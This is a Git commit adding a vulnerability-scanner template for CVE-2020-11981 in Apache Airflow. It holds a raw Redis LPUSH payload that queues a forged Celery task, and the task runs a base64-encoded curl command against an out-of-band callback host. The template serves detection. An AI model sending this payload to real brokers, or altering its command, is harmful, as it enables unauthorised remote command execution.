CVE-2020-11981
parent
9ca1706cf2
commit
e9465adf12
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2020-11981
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CVE-2020-11981
|
||||||
|
author: pussycat0x
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
|
||||||
|
reference:
|
||||||
|
- https://redis.io/topics/security
|
||||||
|
tags: network,redis,unauth,apache,airflow
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
|
||||||
|
variables:
|
||||||
|
lpush: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$904\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1tbImN1cmwiLCAiaHR0cDovL3t7aW50ZXJhY3RzaC11cmx9fSJdXSwge30sIHsiY2hhaW4iOiBudWxsLCAiY2hvcmQiOiBudWxsLCAiZXJyYmFja3MiOiBudWxsLCAiY2FsbGJhY2tzIjogbnVsbH1d\"}"
|
||||||
|
|
||||||
|
tcp:
|
||||||
|
- inputs:
|
||||||
|
- data: "{{lpush}"
|
||||||
|
read: 1024
|
||||||
|
host:
|
||||||
|
- "{{Hostname}}"
|
||||||
|
- "{{Host}}:6379"
|
||||||
|
read-size: 2048
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "dns"
|
Loading…
Reference in New Issue